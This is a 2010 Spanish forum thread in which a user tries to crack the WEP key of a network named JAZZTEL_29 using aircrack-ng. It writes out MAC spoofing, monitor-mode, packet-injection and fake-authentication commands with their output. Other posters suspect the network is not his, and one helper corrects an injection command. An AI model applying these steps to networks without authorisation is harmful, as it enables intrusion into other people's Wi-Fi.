Autor Tema: JAZZTEL_XX (numeros) (Leído 4013 veces)

Choronick · « **en:** 07-11-2010, 00:56 (Domingo) »

Hola a todos!
Yo uso Ubuntu 10.10 Maverick (Linux) ahora mismo.
Para probar la seguridad de la red uso aircrack-ng. ($ sudo apt-get install aircrack-ng)
Uso terminator para quien no lo conozca es una aplicación que te permite abrir una consola multiple que es mas cómodo(ver mi captura de pantalla)($ sudo apt-get install terminator)
OBJETIVO (para algunos facil): PONER A PRUEBA CONTRASEÑA WEP DE JAZZTEL_29

El caso es que hago en la consola:
$ iwconfig

lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:off
wlan1 IEEE 802.11bg ESSID:off/any
Mode:Managed Frequency:2.452 GHz Access Point: Not-Associated
Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:off
y vale me detecta la antenita RTL8187 tan rexula ke tengo en wlan1
Ahora podria falsear mi MAC haciendo $ macchanger -m 00:11:22:33:44:55 wlan1
((Para descargar macchanger: $ sudo apt-get install macchanger)
Me pongo en modo monitor haciendo
$ ifconfig wlan1 down
$ airmon-ng start wlan1

Se activará mon0. Pero atención! A mi me avisa de que:
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID   Name
1045   avahi-daemon
1046   avahi-daemon (éstos no me pregunteis de ke coño son)
1076   NetworkManager Puede que sea el Gestor de Red de Sistema-Preferencias-Aplicaciones al inicio.
1188   wpa_supplicant y este no se igual esta relaccionados entre todos...
10342   dhclient ---------------->Iconito ondas de la barra de tareas

Interface   Chipset      Driver

wlan0      Broadcom   b43 - [phy0]
wlan1      RTL8187    rtl8187 - [phy2]
            (monitor mode enabled on mon0)
Según creo los procesos que crean conflictos con la suite de aircrack-ng.
Quizas deberia cerrarlos...Pero no lo he conseguido con $ kill <Nº PID>. ni tampoco con $ kill -9 <PID>
Y ya me pongo a observar todo con haciendo:
$ sudo airodump-ng mon0

Veo todas las redes disponibles pero las intensidades estan en negativo, sera algo del controlador, cuanto menos tengo parece que es mas, no me fio mucho de ellas.Pero ahora empiezan mis problemas, no se como cambiarme de canal para capturar con airodump-ng.Intento capturar haciendo:
$ sudo aireplay-ng -3 -b 00:1A:2B:xx:xx:xx -h xx:xx:xx:xx:xx:xx mon0

17:35:27 Waiting for beacon frame (BSSID: 00:1A:xx:xx:xx:xx) on channel -1
17:35:27 mon0 is on channel -1, but the AP uses channel 11
Y me dice que esta en el canal -1 (yo flipo!) Pues pongo para intentar cambiarlo de canal
$ sudo iwconfig mon0 channel 11

No me pone error ni nada, es decir me pasa a otra linea, pero luego intento otra vez el comando anterior y me dice lo mismo, que na que esta en -1...Me cambio de canal con wlan1 desactivando el modo monitor en el primer comando, cambiando de canal en el segundo comando, volviendo a activar modo monitor en el tercero y capturando trafico con el último.
$ sudo airmon-ng stop wlan1 mon0
$ sudo iwconfig wlan1 mode monitor channel 11
$ sudo airmon-ng start wlan1
$ sudo airodump-ng -w redes -c11 wlan1

Notar que he uso interfaz wlan1 y no he podido con mon0, supongo que da igual.Me empieza a capturar trafico y lo guarda en redes-01.cap en mi carpeta personal, vale bien. Ahora intento inyectar ya que no tengo tráfico en mi red y no suben los #Data, haciendo:
$ sudo aireplay-ng -3 -b 00:1A:2B:xx:xx:xx -h xx:xx:xx:xx:xx:xx wlan1

ioctl(SIOCSIWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run 'airmon-ng start wlan1 <#>'
Sysfs injection support was not found either.
Esto supuse que es por no desactivar el iconito de las ondas. Doy click derecho y desactivar redes y ahora vuelvo a hacer:
$ sudo aireplay-ng -3 -b 00:1A:2B:xx:xx:xx -h xx:xx:xx:xx:xx:xx wlan1

Pongo wlan1 porque mon0 sigue empanao en el canal -1.Ahora empieza a "Read packets..." pero no pilla ni un ARP en mucho tiempo
Intento establecer una conexión con (otro tipo de ataque aireplay-ng)
$ sudo aireplay-ng -1 0 -e JAZZTEL_29 -a 00:1A:2B:xx:xx:xx -h xx:xx:xx:xx:xx:xx mon0

17:46:59 Waiting for beacon frame (BSSID: 00:1A:2B:xx:xx:xx) on channel 11
17:46:59 Sending Authentication Request (Open System)
17:47:01 Sending Authentication Request (Open System)
17:47:03 Sending Authentication Request (Open System)
17:47:05 Sending Authentication Request (Open System)
17:47:07 Sending Authentication Request (Open System)
17:47:09 Sending Authentication Request (Open System)
17:47:11 Sending Authentication Request (Open System)
17:47:13 Sending Authentication Request (Open System)
17:47:15 Sending Authentication Request (Open System)
17:47:17 Sending Authentication Request (Open System)
17:47:19 Sending Authentication Request (Open System)
17:47:21 Sending Authentication Request (Open System)
17:47:23 Sending Authentication Request (Open System)
17:47:25 Sending Authentication Request (Open System)
17:47:27 Sending Authentication Request (Open System)
17:47:29 Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower
the transmit rate.
No pone conexion establecida y menos la carita sonriente que tanto me gustaba en wifislax ;-)
Al ver que no puedo hacer subir los data con estos dos tipos de airodump-ng.Lo que hago es intentar conectarme a la red desde el icono de las ondas, ya sabeis, en el ubuntu 10.10 en la barra de tareas alado del sonido.Creo que dhclient se llama ese programa predeterminado.
Click en el icono y pongo cualquier contraseña en la red objetivo y habiendo dejado abierto la consola del airodump que estaba capturando en redes-01.cap.Cual es mi sorpresa cuando veo que suben los datas mientras intenta conectar, sin exito claro con la contraseña incorrecta, pero no suben mucho, solo 1 cada 5 segundos o asi, y encima se intenta conectar durante 1 minuto y luego deja de intentarlo. Y lo tengo que hacer manualmente
A ese ritmo he conseguido reunir 500 datas en 1 hora o asi, pero hago un
$ aircrack-ng redes-01.cap

Selecciono el objetivo 1.Y claro con tan pocos #Datas me dice:
Aircrack-ng 1.1 [00:00:03] Tested 168013 keys (got 538 IVs) Failed. Next try with 5000 IVs
Aun asi me guardare el redes-01.cap. Para si capturo mas paquetes con otro poder hacer:

$ aircrack-ng redes-01.cap redes-02.cap
etc,,, todo junto
Se me acabaron las ideas $:-\$
Yo creo que deberia hacer kill a todos los procesos que tuvieran que ver con gestión de redes en Ubuntu 10.10. Pero no se cuales son, no se cuales son en Monitor del sistema.Se os ocurre algo??¿?

Manbostar · « **Respuesta #1 en:** 07-11-2010, 01:38 (Domingo) »

Buenas

Citar

Quizas deberia cerrarlos...Pero no lo he conseguido con $ kill <Nº PID>. ni tampoco con $ kill -9 <PID>

¿sudo kill < Nº PID>?

Me da en la nariz que la red no es tuya...

Saludos

Kozaki666 · « **Respuesta #2 en:** 07-11-2010, 03:07 (Domingo) »

El driver en cuestión no está parcheado para inyección.

Choronick · « **Respuesta #3 en:** 08-11-2010, 23:18 (Lunes) »

@Kozaki666: Gracias por ayudar tio
Como lo parcheo el chip RTL8187? en ubuntu 10.10?
Porke en wifislax ya tiraba kreo

@Mambostar
Si.
$ sudo kill < Nº PID>
o mas fuerte todavia
$ sudo -9 kill < Nº PID>
Pero ni así consigo cerrarlos.
lo de N PID sustituyes en N por el numero del proceso. Hay otro comando para mirar los procesos segun sus PIDs no me acuerdo ahora.
Ke te da en la nariz el ké? es mi red.

bobysolo · « **Respuesta #4 en:** 09-11-2010, 00:40 (Martes) »

@Choronick

Es es mi ssid y mis datos..... ya se quien eres

drvalium · « **Respuesta #5 en:** 09-11-2010, 00:50 (Martes) »

bobysolo, explica eso mejor, por favor

¿estas diciendo que Choronick está poniendo tus datos en el foro? eso vendría a decir que intenta reventar tu red ¿lo he entendido bien?

tanto el SSID como los tres primeros pares de las MAC son comunes para muchísimas personas ¿lo tienes en cuenta?

Choronick · « **Respuesta #6 en:** 09-11-2010, 01:55 (Martes) »

Por dios drvalium!
No ves que esta bromeando? A mi no me hace gracia pero bueno...

Bueno a lo que vamos porfavor:

Sabeis como se parchea un chip RTL8187 en ubuntu 10.10 para que inyecte bien?

Gracias

drvalium · « **Respuesta #7 en:** 09-11-2010, 02:04 (Martes) »

pues la verdad es que no me lo he tomado en broma, puede que sea por que tampoco le he visto gracia alguna

Choronick · « **Respuesta #8 en:** 09-11-2010, 02:14 (Martes) »

Gracias por la atencion drvalium.
Creo que el problema esta relaccionado con mi chip y el kernel supongo...
El tema es que al activarse el mon0 lo fixea al canal -1...
He visto en un foro el mismo problema que el mio sin solucion clara:

Me pongo a capturar trafico de un solo canal, osea el mio tal que así:

sudo airodump-ng -c 7 --bssid XX:XX:XX:XX:XX:XX mon0

CH 7 ][ Elapsed: 2 mins ][ 2010-09-05 00:24 ][ fixed channel mon0: -1

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E

XX:XX:XX:XX:XX:XX -65 0 572 80 0 7 54e. WEP WEP W

BSSID STATION PWR Rate Lost Packets Probes

El problema viene en el fixed channel mon0: -1, ya que al intentar asociar...:

user@ubuntu:~$ sudo aireplay-ng -1 30 -e WLANXXXXX -a XX:XX:XX:XX:XX:XX mon0 No source MAC (-h) specified. Using the device MAC (XX:XX:XX.XX:XX:XX)
00:22:38 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1
00:22:38 mon0 is on channel -1, but the AP uses channel 7

Me grabare un CD de wifislax y me dejare de parchear... Ke por lo menos la antenita con ubuntu coge bien internet en cualquier lado.

(http://foro.elhacker.net/wireless_en_linux/problema_con_aircrack_en_ubuntu_910-t303993.0.html#ixzz14k9dzK2b)

drvalium · « **Respuesta #9 en:** 09-11-2010, 02:26 (Martes) »

en ese comando falta un trozo, te olvidas poner la MAC de tu adaptador, el aviso que te suelta es lo que te dice:

No source MAC (-h) specified. Using the device MAC (XX:XX:XX.XX:XX:XX)

sudo aireplay-ng -1 30 -e WLANXXXXX -a XX:XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX mon0

¿has probado a fijar el canal con iwconfig?

sudo iwconfig mon0 channel X

sobre parchear los drivers no puedo ayudarte, Ubuntu no es que sea mi Linux favorito ni lo desconozco pero me suena que no hay que parchearlo.

Cita de: Choronick en 09-11-2010, 02:14 (Martes)

Me grabare un CD de wifislax y me dejare de parchear... Ke por lo menos la antenita con ubuntu coge bien internet en cualquier lado.

mejor Wifiway 2.0.1, con este igual hasta dejas de usar Ubuntu

un saludo

bobysolo · « **Respuesta #10 en:** 09-11-2010, 12:32 (Martes) »

@Choronick

perdón, no quise confundir, solo que ese SSIDD lo tengo muy cercano....

ademas tu post es de lectura.

Saludos
CPM

Choronick · « **Respuesta #11 en:** 10-11-2010, 19:41 (Miércoles) »

Gracias, lo intentare con ese wifiway
Ke el wifislax es mas famoso yo creo, pero wifiway es mejor ( eso dicen )

Tu que linux me recomiendas drvalium?
Wifiway?

Noticias:

Autor Tema: JAZZTEL_XX (numeros) (Leído 4013 veces)

Choronick

JAZZTEL_XX (numeros)

Manbostar

Re: JAZZTEL_XX (numeros)

Kozaki666

Re: JAZZTEL_XX (numeros)

Choronick

Re: JAZZTEL_XX (numeros)

bobysolo

Re: JAZZTEL_XX (numeros)

drvalium

Re: JAZZTEL_XX (numeros)

Choronick

Re: JAZZTEL_XX (numeros)

drvalium

Re: JAZZTEL_XX (numeros)

Choronick

Re: JAZZTEL_XX (numeros)

drvalium

Re: JAZZTEL_XX (numeros)

bobysolo

Re: JAZZTEL_XX (numeros)

Choronick

Re: JAZZTEL_XX (numeros)